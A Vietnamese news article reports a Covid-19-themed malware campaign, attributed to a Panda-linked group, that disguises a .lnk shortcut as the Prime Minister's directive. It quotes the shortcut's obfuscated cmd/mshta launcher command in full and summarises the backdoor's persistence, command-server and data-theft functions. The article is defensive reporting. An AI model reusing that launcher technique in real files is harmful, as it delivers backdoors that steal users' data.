Xuất hiện mã độc mạo danh chỉ thị của Thủ tướng về dịch Covid-19

Ngọc Lưu - 09/03/2020 17:10 (GMT+7)

(VNF) - Mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc” liên quan đến công tác phòng chống dịch Covid-19, nhằm đánh lừa người dùng.

Thông tin từ Tập đoàn công nghệ CMC cho biết lợi dụng tình hình căng thẳng của dịch cúm Covid-19, mẫu mã độc giống với một số mẫu do nhóm tin tặc Panda phát triển được phát hiện đã thực hiện mạo danh văn 3 bản thông báo của chính phủ về tình hình dịch.

Mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc”.

Cụ thể, mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc” nhằm đánh lừa người dùng. File mẫu là một file shortcut có phần mở rộng là “.lnk” được ẩn dưới dạng một file winword nhằm đánh lừa người dùng do đuôi “.lnk” sẽ được Windows ẩn đi.

Tuy nhiên, file winword này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: “%comspec% /c for %x in (%temp%=%cd%) do for /f “delims==” %i in (‘dir “%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk” /s /b’) do start m%windir:~-1,1%hta.exe “%i”.

Sau khi lừa người dùng tải về, qua hàng loạt lệnh, mã độc sẽ tiến hành tạo bản sao của 3 file thực thi vào thư mục profile của user hoặc alluserprofile nếu có đủ quyền administrator; thêm và khóa autorun để tự kích hoạt file thực thi vừa drop ra khi khởi động lại máy; tạo mutex, kết nối đến server (máy chủ) để nhận lệnh từ server; tạo backdoor (cửa hậu) cho phép kẻ tấn công thực thi lệnh từ xa; hay hỗ trợ nhiều lệnh thực thi khác nhau bao gồm upload file, thư mục, list folder, đọc file, lấy thông tin máy tính, thông tin người dùng…

"Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng người đứng sau phát triển mã độc đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp", các chuyên gia của CMC nhận định.

Đây là một loại tấn công nguy hiểm, được đầu tư kỹ lưỡng nhằm đánh cắp các thông tin quan trọng và gây nhiều thiệt hại cho tổ chức. Để phòng ngừa các cuộc tấn công, các chuyên gia khuyến cáo người dùng luôn cảnh giác và chuẩn bị các phương án đề phòng, giám sát liên tục mới có thể đảm bảo tính an toàn cho hệ thống.

Cùng chuyên mục
Tin khác